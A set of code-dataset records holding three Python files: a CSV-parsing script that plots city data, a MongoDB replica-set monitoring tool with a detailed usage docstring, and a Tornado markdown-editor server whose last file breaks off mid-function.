re\nimport numpy as np\nimport csv\nimport plotly\nimport plotly.graph_objs as go\nfrom plotly import tools\nimport itertools\nfrom itertools import groupby\nfrom collections import defaultdict, namedtuple\n\n\n\n\n\ndef getElement(line):\n result = re.split(r',', line, maxsplit=1)\n element = result[0].strip()\n return element, result[1]\ndef getid(line):\n id, line = getElement(line)\n return id, line\ndef getname(line):\n name, line = getElement(line)\n return name, line\ndef getaddress(line):\n address, line = getElement(line)\n return address, line\ndef getCity(line):\n city, line = getElement(line)\n return city, line\ndef getState(line):\n state, line = getElement(line)\n state = state[0:].upper()\n return state, line\ndef getPostalCode(line):\n result=re.split(r',', line, maxsplit=1)\n postalcode = re.findall(r'\\d{5}', result[0])[0]\n return postalcode, result[1]\ndef getLatitude(line):\n result = re.split(r',', line, maxsplit=1)\n latitude = re.findall(r'\\d\\d\\.\\d{6}', result[1])[0]\n latitude=latitude.replace(\",\",\".\")\n return latitude, result[1]\n\ndef read_csv_line(line_number, input_file):\n with open(input_file) as fileobj:\n for i, line in enumerate(fileobj):\n if i == (line_number - 1):\n return line\n return None\n\ncolumns = defaultdict(list)\na={}\nl=[]\ntry:\n\n with open(input_file, encoding=\"utf-8\", mode='r') as file:\n line_number = 0\n dataset = dict()\n # print(dataset)\n # print(dataset.keys())\n file.readline()\n i=1\n\n for line in file:\n line = line.strip().rstrip()\n line_number += 1\n if not line:\n continue\n if line_number==20:\n break\n id, line = getElement(line)\n name, line = getElement(line)\n address, line = getElement(line)\n city, line = getCity(line)\n state, line = getState(line)\n postalcode, line = getPostalCode(line)\n latitude, line = getLatitude(line)\n l.append(latitude)\n #print(city, postalcode, latitude)\n if state in dataset:\n if city in dataset[state]:\n dataset[state][city]=[postalcode, latitude]\n if postalcode and latitude in dataset[state][city]:\n dataset[state][city]=[postalcode, latitude]\n else:\n dataset[state][city]=[]\n else:\n dataset[state]={city:[postalcode, latitude]}\n else:\n dataset[state]={city:[]}\n if i==1:\n dataset[state]={city:[postalcode, latitude]}\n i+=1\n print(dataset)\n with open(input_file) as 
file:\n reader = csv.DictReader(file)\n for row in reader: # read a row as {column1: value1, column2: value2,...}\n for (k, v) in row.items(): # go over each column name and value\n columns[k].append(v) # append the value into the appropriate list\n # based on column name k\n\n\nexcept IOError as e:\n print (\"I/O error({0}): {1}\".format(e.errno, e.strerror))\n\nexcept ValueError as ve:\n print(\"Value error {0} in line {1}\".format(ve, line_number))\nb=list(columns['city'])\nfor x in range(2, 23):\n a.update({x:[read_csv_line(x, input_file)]})\n#a имеет ключи начиная с 3\n\n\n\ns=list(dataset.keys())\n\nu=[]\nfor state in list(dataset.keys()):\n citu=dataset[state]\n for city in list(citu.keys()):\n u.append(city)\nbar = [go.Bar(x=s, y=u)]\nplotly.offline.plot(bar, filename='bar.html')\ntrace = [go.Scatter(x=l, y=u)]\nplotly.offline.plot(trace, filename='trace.html')\n","sub_path":"3/programm/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"578554640","text":"#!/usr/bin/python\n# Classification (U)\n\n\"\"\"Program: mongo_rep_admin.py\n\n Description: Administration program for Mongo replica set. The program\n has a number of functions to monitor the status of replication between\n primary and secondary databases. The program can monitor and check on\n a number of different aspects in replication to include checking master\n status, membership status, replication time lag between primary and\n secondaries, and replication configuration status.\n\n Usage:\n mongo_rep_admin.py -c file -d path\n {-L [-j [-f]] [-z] [-o dir_path/file [-a]] [-i [db:coll] -m file]\n [-e toEmail {toEmail2, [...]} [-s subject] [-u]] |\n -N [ [-f] [-e toEmail {toEmail2, [...]} [-s subject] [-u]] [-z] |\n -M | -P | -S | -T }\n [-v | -h]\n\n Arguments:\n -c file => Server configuration file. Required arg.\n -d dir path => Directory path to config file (-c). Required arg.\n\n -L => Check Replication lag.\n -j => Set output to JSON format.\n -f => Flatten the JSON data structure to file and standard out.\n -i [database:collection] => Name of database and collection.\n Delimited by colon (:). Default: sysmon:mongo_rep_lag\n -m file => Mongo config file used for the insertion into a Mongo\n database. Do not include the .py extension.\n -o path/file => Directory path and file name for output.\n Default is to overwrite the file.\n -a => Append output to output file.\n -e to_email_addresses => Sends output to one or more email\n addresses. Email addresses are space delimited.\n -s subject_line => Subject line of email.\n -u => Override the default mail command and use mailx.\n -z => Suppress standard out.\n\n -M => Show current members in replication set.\n\n -N => Node health check. Returns if a node has a problem or is down.\n -f => Flatten the JSON data structure to file and standard out.\n -e to_email_addresses => Sends output to one or more email\n addresses. 
Email addresses are space delimited.\n            -s subject_line => Subject line of email.\n            -u => Override the default mail command and use mailx.\n            -z => Suppress standard out.\n\n        -P => Show priority for members in replication set.\n\n        -S => Check status of rep for members in rep set, but will only print\n            the status if errors are detected.\n\n        -T => Check status of rep for members in rep set and will print the\n            status in all checks.\n\n        -v => Display version of this program.\n        -h => Help and usage message.\n\n        NOTE 1: -v and -h override all other options.\n\n    Notes:\n        Mongo configuration file format (config/mongo.py.TEMPLATE). The\n        configuration file format is for connecting to a Mongo database or\n        replica set for monitoring. A second configuration file can also\n        be used to connect to a Mongo database or replica set to insert the\n        results of the performance monitoring into.\n\n        There are two connection methods: a single Mongo database or a\n        Mongo replica set.\n\n        Single database connection:\n\n        # Single Configuration file for Mongo Database Server.\n        user = \"USER\"\n        japd = \"PSWORD\"\n        host = \"IP_ADDRESS\"\n        name = \"HOSTNAME\"\n        port = 27017\n        conf_file = None\n        auth = True\n        auth_db = \"admin\"\n        auth_mech = \"SCRAM-SHA-1\"\n        use_arg = True\n        use_uri = False\n\n        Replica Set connection: Same format as above, but with these\n        additional entries at the end of the configuration file. By\n        default all these entries are set to None to represent not\n        connecting to a replica set.\n\n        repset = \"REPLICA_SET_NAME\"\n        repset_hosts = \"HOST1:PORT, HOST2:PORT, HOST3:PORT, [...]\"\n        db_auth = \"AUTHENTICATION_DATABASE\"\n\n        Note: If using SSL connections then set one or more of the\n            following entries. This will automatically enable SSL\n            connections. Below are the configuration settings for SSL\n            connections. See configuration file for details on each entry:\n\n            ssl_client_ca = None\n            ssl_client_key = None\n            ssl_client_cert = None\n            ssl_client_phrase = None\n\n        Note: FIPS Environment for Mongo.\n            If operating in a FIPS 140-2 environment, this package will\n            require pymongo==3.8.0 or better. It will\n            also require a manual change to the auth.py module in the pymongo\n            package. See below for changes to auth.py.\n\n            - Locate the auth.py file in the pymongo package directory of the\n            python packages installed on the system.\n            - Edit the file and locate the \"_password_digest\" function.\n            - In the \"_password_digest\" function there is a line that should\n            match: \"md5hash = hashlib.md5()\". Change it to\n            \"md5hash = hashlib.md5(usedforsecurity=False)\".\n            - Lastly, it will require the Mongo configuration file entry\n            auth_mech to be set to: SCRAM-SHA-1 or SCRAM-SHA-256.
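\n\n            Illustrative before/after of that one-line edit (a sketch only;\n            the surrounding code may differ between pymongo versions):\n\n                md5hash = hashlib.md5()                       # original\n                md5hash = hashlib.md5(usedforsecurity=False)  # FIPS mode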
\n\n    Configuration modules -> Name is runtime dependent as it can be used to\n        connect to different databases with different names.\n\n    Example:\n        mongo_rep_admin.py -c mongo -d config -L -j\n\n\"\"\"\n\n# Libraries and Global Variables\n\n# Standard\nimport sys\nimport datetime\n\n# Third party\nimport json\n\n# Local\nimport lib.arg_parser as arg_parser\nimport lib.gen_libs as gen_libs\nimport lib.gen_class as gen_class\nimport mongo_lib.mongo_libs as mongo_libs\nimport mongo_lib.mongo_class as mongo_class\nimport version\n\n__version__ = version.__version__\n\n\ndef help_message():\n\n    \"\"\"Function: help_message\n\n    Description: Displays the program's docstring which is the help and usage\n        message when -h option is selected.\n\n    Arguments:\n\n    \"\"\"\n\n    print(__doc__)\n\n\ndef rep_health_chk(rep_stat, prt_all=False, prt_lvl=1):\n\n    \"\"\"Function: rep_health_chk\n\n    Description: Checks the replication health status for a member.\n\n    Arguments:\n        (input) rep_stat -> Member document from replSetGetStatus.\n        (input) prt_all -> True|False - To print all or just errors.\n        (input) prt_lvl -> Integer - Level at which to print message.\n\n    \"\"\"\n\n    rep_stat = dict(rep_stat)\n\n    if not rep_stat.get(\"health\"):\n        gen_libs.prt_msg(\"Health\", \"Bad\", prt_lvl)\n\n    elif prt_all:\n        gen_libs.prt_msg(\"Health\", \"Good\", prt_lvl)\n\n\ndef rep_state_chk(rep_stat, prt_all=False, prt_lvl=1):\n\n    \"\"\"Function: rep_state_chk\n\n    Description: Checks the state for a member. Requires the member document\n        from a \"replSetGetStatus\" command to be passed to the function.\n\n    Arguments:\n        (input) rep_stat -> Member document from replSetGetStatus.\n        (input) prt_all -> True|False - To print all or just errors.\n        (input) prt_lvl -> Integer - Level at which to print message.\n\n    \"\"\"\n\n    # Good state is 1 (Primary), 2 (Secondary), 7 (Arbiter).\n    good_state = [1, 2, 7]\n    rep_stat = dict(rep_stat)\n\n    if rep_stat.get(\"state\") not in good_state or prt_all:\n        gen_libs.prt_msg(\"State\", rep_stat.get(\"state\"), prt_lvl)\n        gen_libs.prt_msg(\"State Msg\", rep_stat.get(\"stateStr\"), prt_lvl + 1)\n\n\ndef rep_msg_chk(rep_stat, prt_lvl=1):\n\n    \"\"\"Function: rep_msg_chk\n\n    Description: Print data if the infoMessage field is present.\n\n    Arguments:\n        (input) rep_stat -> Member document from replSetGetStatus.\n        (input) prt_lvl -> Integer - Level at which to print message.\n\n    \"\"\"\n\n    rep_stat = dict(rep_stat)\n\n    if rep_stat.get(\"infoMessage\"):\n        gen_libs.prt_msg(\"Error Message\", rep_stat.get(\"infoMessage\"), prt_lvl)\n\n\ndef chk_rep_stat(repset, args_array, **kwargs):\n\n    \"\"\"Function: chk_rep_stat\n\n    Description: Fetch the replication status and process each member in the\n        set.\n\n    Arguments:\n        (input) repset -> Replication set instance.\n        (input) args_array -> Array of command line options and values.\n        (input) **kwargs:\n            mail -> Mail instance.\n            prt_all -> True|False on printing all status messages.\n        (output) status -> Tuple on connection status.\n            status[0] - True|False - Connection successful.\n            status[1] - Error message if connection failed.\n\n    \"\"\"\n\n    status = (True, None)\n    args_array = dict(args_array)\n    print(\"\\nReplication Status Check for Rep Set: %s\" % (repset.repset))\n    prt_all = kwargs.get(\"prt_all\", False)\n\n    # Process each member in replica set.\n    for item in 
repset.adm_cmd(\"replSetGetStatus\").get(\"members\"):\n print(\"\\nServer: %s\" % (item.get(\"name\")))\n rep_health_chk(item, prt_all)\n rep_state_chk(item, prt_all)\n rep_msg_chk(item)\n\n return status\n\n\ndef prt_rep_stat(repset, args_array, **kwargs):\n\n \"\"\"Function: prt_rep_stat\n\n Description: Set the print all flag and call chk_rep_stat function.\n\n Arguments:\n (input) repset -> Replication set instance.\n (input) args_array -> Array of command line options and values.\n (input) **kwargs:\n mail -> Mail instance.\n (output) status -> Tuple on connection status.\n status[0] - True|False - Connection successful.\n status[1] - Error message if connection failed.\n\n \"\"\"\n\n status = (True, None)\n args_array = dict(args_array)\n chk_rep_stat(repset, args_array, prt_all=args_array[\"-T\"])\n\n return status\n\n\ndef fetch_priority(repset, args_array, **kwargs):\n\n \"\"\"Function: fetch_priority\n\n Description: Fetch and print members in the replication set.\n\n Arguments:\n (input) repset -> Replication set instance.\n (input) args_array -> Array of command line options and values.\n (input) **kwargs:\n mail -> Mail instance.\n (output) status -> Tuple on connection status.\n status[0] - True|False - Connection successful.\n status[1] - Error message if connection failed.\n\n \"\"\"\n\n args_array = dict(args_array)\n coll = mongo_class.Coll(\n repset.name, repset.user, repset.japd, host=repset.host,\n port=repset.port, db=\"local\", coll=\"system.replset\", auth=repset.auth,\n conf_file=repset.conf_file, auth_db=repset.auth_db,\n use_arg=repset.use_arg, use_uri=repset.use_uri,\n auth_mech=repset.auth_mech)\n status = coll.connect()\n\n if status[0]:\n print(\"\\nMembers => priority of replica set: %s\" % (repset.repset))\n\n for item in coll.coll_find1()[\"members\"]:\n print(\"\\t{0} => {1}\".format(item[\"host\"], item[\"priority\"]))\n\n mongo_libs.disconnect([coll])\n\n else:\n status = (status[0],\n \"fetch_priority: Connection failure: %s\" % (status[1]))\n\n return status\n\n\ndef fetch_members(repset, args_array, **kwargs):\n\n \"\"\"Function: fetch_members\n\n Description: Fetch and print members in the replication set and identify\n the primary server.\n\n Arguments:\n (input) repset -> Replication set instance.\n (input) args_array -> Array of command line options and values.\n (input) **kwargs:\n mail -> Mail instance.\n (output) status -> Tuple on connection status.\n status[0] - True|False - Connection successful.\n status[1] - Error message if connection failed.\n\n \"\"\"\n\n status = (True, None)\n args_array = dict(args_array)\n print(\"\\nMembers of replica set: %s\" % (repset.repset))\n rep_status = repset.adm_cmd(\"replSetGetStatus\")\n primary = get_master(rep_status)\n print(\"\\t%s (Primary)\" % (primary[\"name\"]))\n\n secondaries = [member for member in rep_status.get(\"members\")\n if member.get(\"state\") == 2]\n\n for second in secondaries:\n print(\"\\t%s\" % (second[\"name\"]))\n\n return status\n\n\ndef get_master(rep_status):\n\n \"\"\"Function: get_master\n\n Description: Find the Primary in the replSetGetStatus document.\n\n Arguments:\n (input) rep_status -> Members document from replSetGetStatus.\n (output) primary -> Primary entry from replSetGetStatus doc.\n\n \"\"\"\n\n rep_status = dict(rep_status)\n primary = None\n\n # Process each member in replica set.\n for member in rep_status.get(\"members\"):\n if member.get(\"state\") == 1:\n primary = member\n break\n\n return primary\n\n\ndef get_optimedate(rep_status):\n\n 
\"\"\"Function: get_optimedate\n\n Description: Get the Best oplog date time from one of the Secondaries.\n\n Arguments:\n (input) rep_status -> Members document from replSetGetStatus.\n (output) optime_date -> Best oplog datetime from Secondaries.\n\n \"\"\"\n\n rep_status = dict(rep_status)\n optime_date = datetime.datetime.strptime(\"1900-01-01 00:00:01\",\n \"%Y-%m-%d %H:%M:%S\")\n\n # Find best datetime from Secondary servers.\n for member in rep_status.get(\"members\"):\n if member.get(\"optimeDate\") > optime_date:\n optime_date = member.get(\"optimeDate\")\n\n return optime_date\n\n\ndef chk_mem_rep_lag(rep_status, **kwargs):\n\n \"\"\"Function: chk_mem_rep_lag\n\n Description: Process each member in the replication set and check for\n replication lag.\n\n Arguments:\n (input) rep_status -> Member document from replSetGetStatus.\n (input) **kwargs:\n json -> True|False - JSON format.\n ofile -> file name - Name of output file.\n db_tbl -> database:collection - Name of db and collection.\n class_cfg -> Server class configuration settings.\n mail -> Mail instance.\n args_array -> Array of command line options and values.\n suf -> Primary|Freshest Secondary who has latest date time.\n optdt -> Primary|Best Oplog date time.\n (output) status -> Tuple on connection status.\n status[0] - True|False - Connection successful.\n status[1] - Error message if connection failed.\n\n \"\"\"\n\n t_format = \"%Y-%m-%d %H:%M:%S\"\n rep_status = dict(rep_status)\n json_fmt = kwargs.get(\"json\", False)\n\n outdata = {\"Application\": \"Mongo Replication\",\n \"RepSet\": rep_status.get(\"set\"),\n \"Master\": get_master(rep_status).get(\"name\"),\n \"AsOf\": datetime.datetime.strftime(datetime.datetime.now(),\n t_format),\n \"Slaves\": []}\n\n # Process each member in replica set.\n for member in rep_status.get(\"members\"):\n\n # Ignore if member is Primary or Abriter.\n if member.get(\"state\") in [1, 7]:\n continue\n\n # Fetch rep lag time.\n if member.get(\"optime\"):\n sec_ago = gen_libs.get_secs(\n kwargs[\"optdt\"] - member.get(\"optimeDate\"))\n outdata[\"Slaves\"].append(\n {\"Name\": member.get(\"name\"),\n \"SyncTo\": datetime.datetime.strftime(\n member.get(\"optimeDate\"), t_format),\n \"LagTime\": sec_ago})\n\n else:\n gen_libs.prt_msg(\"Warning\", \"No replication info available.\", 0)\n\n if json_fmt:\n status = _process_json(outdata, **kwargs)\n\n else:\n status = _process_std(outdata, **kwargs)\n\n return status\n\n\ndef _process_std(outdata, **kwargs):\n\n \"\"\"Function: _process_std\n\n Description: Private function for chk_mem_rep_lag(). 
Process standard out\n formatted data.\n\n Arguments:\n (input) outdata -> JSON document from chk_mem_rep_lag function.\n (input) **kwargs:\n json -> True|False - JSON format.\n ofile -> file name - Name of output file.\n db_tbl -> database:collection - Name of db and collection.\n class_cfg -> Server class configuration settings.\n mail -> Mail instance.\n args_array -> Array of command line options and values.\n suf -> Primary|Freshest Secondary who has latest date time.\n optdt -> Primary|Best Oplog date time.\n (output) status -> Tuple on connection status.\n status[0] - True|False - Connection successful.\n status[1] - Error message if connection failed.\n\n \"\"\"\n\n status = (True, None)\n mode = \"w\"\n mongo_cfg = kwargs.get(\"class_cfg\", None)\n db_tbl = kwargs.get(\"db_tbl\", None)\n ofile = kwargs.get(\"ofile\", None)\n mail = kwargs.get(\"mail\", None)\n args_array = dict(kwargs.get(\"args_array\", {}))\n body = []\n\n if args_array.get(\"-a\", False):\n mode = \"a\"\n\n body.append(\"\\nReplication lag for Replica set: %s.\" % (outdata[\"RepSet\"]))\n\n for item in outdata[\"Slaves\"]:\n body.append(\"\\nSource: {0}\".format(item[\"Name\"]))\n body.append(\"\\tsynced to: {0}\".format(item[\"SyncTo\"]))\n body.append(\"\\t{0} secs ({1} hrs) behind the {2}\".format(\n item[\"LagTime\"], (item[\"LagTime\"] / 36) / 100, kwargs[\"suf\"]))\n\n if mongo_cfg and db_tbl:\n dbs, tbl = db_tbl.split(\":\")\n status = mongo_libs.ins_doc(mongo_cfg, dbs, tbl, outdata)\n\n if not status[0]:\n status = (status[0], \"_process_std: \" + status[1])\n\n if ofile:\n f_hldr = gen_libs.openfile(ofile, mode)\n\n for line in body:\n gen_libs.write_file2(f_hldr, line)\n\n if mail:\n for line in body:\n mail.add_2_msg(line)\n\n mail.send_mail(use_mailx=args_array.get(\"-u\", False))\n\n if not args_array.get(\"-z\", False):\n for item in body:\n print(item)\n\n return status\n\n\ndef _process_json(outdata, **kwargs):\n\n \"\"\"Function: _process_json\n\n Description: Private function for chk_mem_rep_lag(). 
Process JSON data.\n\n Arguments:\n (input) outdata -> JSON document from chk_mem_rep_lag function.\n (input) **kwargs:\n json -> True|False - JSON format.\n ofile -> file name - Name of output file.\n db_tbl -> database:collection - Name of db and collection.\n class_cfg -> Server class configuration settings.\n mail -> Mail instance.\n args_array -> Array of command line options and values.\n suf -> Primary|Freshest Secondary who has latest date time.\n optdt -> Primary|Best Oplog date time.\n (output) status -> Tuple on connection status.\n status[0] - True|False - Connection successful.\n status[1] - Error message if connection failed.\n\n \"\"\"\n\n status = (True, None)\n mode = \"w\"\n indent = 4\n mongo_cfg = kwargs.get(\"class_cfg\", None)\n db_tbl = kwargs.get(\"db_tbl\", None)\n ofile = kwargs.get(\"ofile\", None)\n mail = kwargs.get(\"mail\", None)\n args_array = dict(kwargs.get(\"args_array\", {}))\n\n if args_array.get(\"-a\", False):\n mode = \"a\"\n\n if args_array.get(\"-f\", False):\n indent = None\n\n jdata = json.dumps(outdata, indent=indent)\n\n if mongo_cfg and db_tbl:\n dbs, tbl = db_tbl.split(\":\")\n status = mongo_libs.ins_doc(mongo_cfg, dbs, tbl, outdata)\n\n if not status[0]:\n status = (status[0], \"_process_json: \" + status[1])\n\n if ofile:\n gen_libs.write_file(ofile, mode, jdata)\n\n if mail:\n mail.add_2_msg(jdata)\n mail.send_mail(use_mailx=args_array.get(\"-u\", False))\n\n if not args_array.get(\"-z\", False):\n gen_libs.display_data(jdata)\n\n return status\n\n\ndef chk_rep_lag(repset, args_array, **kwargs):\n\n \"\"\"Function: chk_rep_lag\n\n Description: See if replication is running and find the best Oplog\n datetime whether Primary or Secondary.\n\n Arguments:\n (input) repset -> Replication set instance.\n (input) args_array -> Array of command line options and values.\n (input) **kwargs:\n mail -> Mail instance.\n (output) status -> Tuple on connection status.\n status[0] - True|False - Connection successful.\n status[1] - Error message if connection failed.\n\n \"\"\"\n\n args_array = dict(args_array)\n json_fmt = args_array.get(\"-j\", False)\n outfile = args_array.get(\"-o\", None)\n db_tbl = args_array.get(\"-i\", None)\n rep_status = repset.adm_cmd(\"replSetGetStatus\")\n primary = get_master(rep_status)\n mongo_cfg = None\n\n if args_array.get(\"-m\", None):\n mongo_cfg = gen_libs.load_module(args_array[\"-m\"], args_array[\"-d\"])\n\n if primary:\n optime_date = primary.get(\"optimeDate\")\n suffix = \"primary\"\n\n # Use best datetime from Secondaries.\n else:\n optime_date = get_optimedate(rep_status)\n suffix = \"freshest secondary\"\n\n status = chk_mem_rep_lag(\n rep_status, optdt=optime_date, suf=suffix, json=json_fmt,\n ofile=outfile, db_tbl=db_tbl, class_cfg=mongo_cfg,\n args_array=args_array, **kwargs)\n\n return status\n\n\ndef node_chk(mongo, args_array, **kwargs):\n\n \"\"\"Function: node_chk\n\n Description: Check the status of all Mongo nodes. 
Will only output\n something if a node is down or an error is detected.\n\n Arguments:\n (input) mongo -> Mongo instance.\n (input) args_array -> Array of command line options and values.\n (input) **kwargs:\n mail -> Mail instance.\n (output) status -> Tuple on connection status.\n status[0] - True|False - Connection successful.\n status[1] - Error message if connection failed.\n\n \"\"\"\n\n status = (True, None)\n args_array = dict(args_array)\n mail = kwargs.get(\"mail\", None)\n node_status = {}\n\n indent = None if args_array.get(\"-f\", False) else 4\n\n for node in mongo.adm_cmd(\"replSetGetStatus\").get(\"members\"):\n status2 = single_node_chk(node)\n\n if status2:\n node_status[node.get(\"name\")] = status2\n\n if node_status:\n jnode_status = json.dumps(node_status, indent=indent)\n\n if not args_array.get(\"-z\", False):\n gen_libs.display_data(jnode_status)\n\n if mail:\n if not mail.subj:\n subj = \"Node Status Check for Rep Set: %s\" % mongo.repset\n mail.create_subject(subj=subj)\n\n mail.add_2_msg(jnode_status)\n mail.send_mail(use_mailx=args_array.get(\"-u\", False))\n\n return status\n\n\ndef single_node_chk(node):\n\n \"\"\"Function: single_node_chk\n\n Description: Check the status of a single node. Will only output\n something if a node is down or an error is detected.\n\n Arguments:\n (input) node -> Dictionary of Mongo node health stats.\n (output) status -> Dictionary of node stats found.\n\n \"\"\"\n\n # Good state is 1 (Primary), 2 (Secondary), 7 (Abriter).\n good_state = [1, 2, 7]\n node = dict(node)\n status = {}\n\n if not node.get(\"health\"):\n status[\"Health\"] = \"Bad\"\n\n if node.get(\"state\") not in good_state:\n status[\"State\"] = node.get(\"state\")\n status[\"State_Message\"] = node.get(\"stateStr\")\n\n if node.get(\"infoMessage\"):\n status[\"Error_Message\"] = node.get(\"infoMessage\")\n\n return status\n\n\ndef _call_func(args_array, func_dict, repinst):\n\n \"\"\"Function: _call_func\n\n Description: Private function for run_program. 
Call each function\n selected.\n\n Arguments:\n (input) args_array -> Dict of command line options and values.\n (input) func_dict -> Dictionary list of functions and options.\n (input) repset -> Replication set instance.\n\n \"\"\"\n\n args_array = dict(args_array)\n func_dict = dict(func_dict)\n mail = None\n\n if args_array.get(\"-e\", None):\n mail = gen_class.setup_mail(\n args_array.get(\"-e\"), subj=args_array.get(\"-s\", None))\n\n # Call function: Intersection of command line & function dict.\n for item in set(args_array.keys()) & set(func_dict.keys()):\n status3 = func_dict[item](repinst, args_array, mail=mail)\n\n if not status3[0]:\n print(\"Error detected: %s\" % (status3[1]))\n\n\ndef run_program(args_array, func_dict):\n\n \"\"\"Function: run_program\n\n Description: Creates class instance(s) and controls flow of the program.\n\n Arguments:\n (input) args_array -> Dict of command line options and values.\n (input) func_dict -> Dictionary list of functions and options.\n\n \"\"\"\n\n args_array = dict(args_array)\n func_dict = dict(func_dict)\n server = gen_libs.load_module(args_array[\"-c\"], args_array[\"-d\"])\n\n # Only pass authorization mechanism if present.\n auth_mech = {\"auth_mech\": server.auth_mech} if hasattr(\n server, \"auth_mech\") else {}\n\n coll = mongo_class.Coll(\n server.name, server.user, server.japd, host=server.host,\n port=server.port, db=\"local\", coll=\"system.replset\", auth=server.auth,\n conf_file=server.conf_file, auth_db=server.auth_db,\n use_arg=server.use_arg, use_uri=server.use_uri, **auth_mech)\n status = coll.connect()\n\n if status[0]:\n\n # Is replication setup.\n if coll.coll_cnt() != 0:\n\n # Get replica set name if not in config.\n if server.repset:\n rep_set = server.repset\n\n else:\n rep_set = coll.coll_find1().get(\"_id\")\n\n repinst = mongo_class.RepSet(\n server.name, server.user, server.japd, host=server.host,\n port=server.port, auth=server.auth, repset=rep_set,\n repset_hosts=server.repset_hosts, auth_db=server.auth_db,\n use_arg=server.use_arg, use_uri=server.use_uri, **auth_mech)\n status2 = repinst.connect()\n\n if status2[0]:\n\n _call_func(args_array, func_dict, repinst)\n mongo_libs.disconnect([repinst])\n\n else:\n print(\"run_program.RepSet: Connection failure: %s\"\n % (status2[1]))\n\n else:\n gen_libs.prt_msg(\"Error\", \"No replication found.\", 0)\n\n mongo_libs.disconnect([coll])\n\n else:\n print(\"run_program.Coll: Connection failure: %s\" % (status[1]))\n\n\ndef main():\n\n \"\"\"Function: main\n\n Description: Initializes program-wide used variables and processes command\n line arguments and values.\n\n Variables:\n dir_chk_list -> contains options which will be directories.\n file_chk_list -> contains the options which will have files included.\n file_crt_list -> contains options which require files to be created.\n func_dict -> dictionary list for the function calls or other options.\n opt_con_req_list -> contains the options that require other options.\n opt_def_dict -> contains options with their default values.\n opt_req_list -> contains the options that are required for the program.\n opt_val_list -> contains options which require values.\n\n Arguments:\n (input) argv -> Arguments from the command line.\n\n \"\"\"\n\n cmdline = gen_libs.get_inst(sys)\n dir_chk_list = [\"-d\"]\n file_chk_list = [\"-o\"]\n file_crt_list = [\"-o\"]\n func_dict = {\"-L\": chk_rep_lag, \"-M\": fetch_members, \"-S\": chk_rep_stat,\n \"-P\": fetch_priority, \"-T\": prt_rep_stat, \"-N\": node_chk}\n opt_con_req_list = 
{\"-i\": [\"-m\"], \"-s\": [\"-e\"], \"-u\": [\"-e\"]}\n opt_def_dict = {\"-j\": False, \"-i\": \"sysmon:mongo_rep_lag\"}\n opt_multi_list = [\"-e\", \"-s\"]\n opt_req_list = [\"-c\", \"-d\"]\n opt_val_list = [\"-c\", \"-d\", \"-i\", \"-m\", \"-o\", \"-e\", \"-s\"]\n\n # Process argument list from command line.\n args_array = arg_parser.arg_parse2(cmdline.argv, opt_val_list,\n opt_def_dict, multi_val=opt_multi_list)\n\n if not gen_libs.help_func(args_array, __version__, help_message) \\\n and not arg_parser.arg_require(args_array, opt_req_list) \\\n and arg_parser.arg_cond_req(args_array, opt_con_req_list) \\\n and not arg_parser.arg_dir_chk_crt(args_array, dir_chk_list) \\\n and not arg_parser.arg_file_chk(args_array, file_chk_list,\n file_crt_list):\n run_program(args_array, func_dict)\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","sub_path":"mongo_rep_admin.py","file_name":"mongo_rep_admin.py","file_ext":"py","file_size_in_byte":28410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"114289513","text":"# coding:utf-8\n\nimport logging\nimport json\nimport os.path as osp\n\nimport tornado.httpserver\nimport tornado.ioloop\nimport tornado.web\nimport tornado.gen as gen\nfrom tornado.web import asynchronous\nimport tornado.websocket\n\nfrom mdi.main import settings, g, urls\n\n\nclass BaseHandler(tornado.web.RequestHandler):\n def render(self, path, **kwargs):\n g.render.render(self, path, **kwargs)\n\n def macro(self, path):\n return g.render.macro(path)\n\n def input(self, name, default=None, strip=True):\n return super(BaseHandler, self).get_argument(name, default, strip)\n\n def prepare(self):\n '''每次都检查文件'''\n conf = json.loads(open(settings.CONF_PATH).read())\n for p in conf.get('paths', []):\n if not osp.exists(p):\n conf['paths'].remove(p)\n open(settings.CONF_PATH, 'w').write(json.dumps(conf))\n\n\nclass Image(BaseHandler):\n def get(self, path):\n conf = json.loads(open(settings.CONF_PATH).read())\n last = conf['last']\n ext = last.rsplit('.')[-1].replace('jpg', 'jpeg')\n\n import urllib\n path = urllib.unquote(path)\n path = osp.join(osp.dirname(last), 'img', path)\n self.set_header('Content-Type', 'image/%s' % ext)\n self.write(open(path, 'rb').read())\n\n\nclass Editor(BaseHandler):\n def get(self):\n conf = json.loads(open(settings.CONF_PATH).read())\n paths = conf.get('paths', [])\n last = conf.get('last', '')\n md = ''\n if last:\n md = open(last).read().decode('utf-8')\n self.render('editor.html', md=md, paths=paths, last=last)\n\n\nclass SocketHandler(tornado.websocket.WebSocketHandler):\n @asynchronous\n @gen.coroutine\n def tailstream(self, msg):\n import time\n import os\n\n path = osp.expanduser(msg['path'].strip())\n lm = msg['lm']\n\n timeout = msg.get('to', 1)\n\n conf = json.loads(open(settings.CONF_PATH).read())\n if conf.get('last') != path:\n conf['last'] = path\n open(settings.CONF_PATH, 'w').write(json.dumps(conf))\n\n while 1:\n suc = osp.exists(path)\n if not suc:\n self.write_message({'err': True, 'msg': u'文件不存在!'})\n return\n\n mtime = os.stat(path)[8]\n if lm != mtime:\n data = open(path).read()\n self.write_message({'lm': mtime, 'data': data})\n lm = mtime\n\n yield gen.Task(\n tornado.ioloop.IOLoop.instance().add_timeout,\n time.time() + timeout)\n\n def on_message(self, msg):\n msg = json.loads(msg)\n self.tailstream(msg)\n\n\nclass AddPath(BaseHandler):\n def post(self):\n path = osp.expanduser(self.input('fullpath'))\n\n if not osp.exists(path):\n self.write({'err': True, 'msg': 
